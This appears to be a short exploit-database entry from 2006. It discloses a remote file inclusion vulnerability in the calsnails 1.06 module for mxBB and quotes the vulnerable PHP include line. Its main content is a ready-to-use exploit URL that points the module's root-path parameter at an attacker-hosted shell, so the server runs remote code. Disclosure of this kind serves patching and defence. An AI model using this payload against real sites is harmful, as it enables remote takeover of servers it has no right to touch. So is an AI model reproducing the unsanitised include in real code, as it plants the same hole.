id: 1176
date: 11/17/2006
title: mxBB Module calsnails 1.06 (mx_common.php) File Include Vulnerability
author: bd0rk
cves: 

=====================================================================
mxBB Module calsnails 1.06 (mx_common.php) File Include Vulnerability
=====================================================================


##################################################################
#                                                                #
# mxBB calsnails module 1.06 Remote File Inclusion Vulnerability #
#                                                                #
# Bugfounder: bd0rk || SOH-Crew                                  #
#                                                                #
# Gr33tings: nukedx, DeeJay, TheJT                               #
#                                                                #
##################################################################


Vulnerable Code: include_once($module_root_path . 'includes/cal_settings.'.$phpEx);

[+]Exploit: http://[site]/[path]/includes/mx_common.php?module_root_path=http://Y0urSh3LL?



#  0day.today [2023-03-23]  #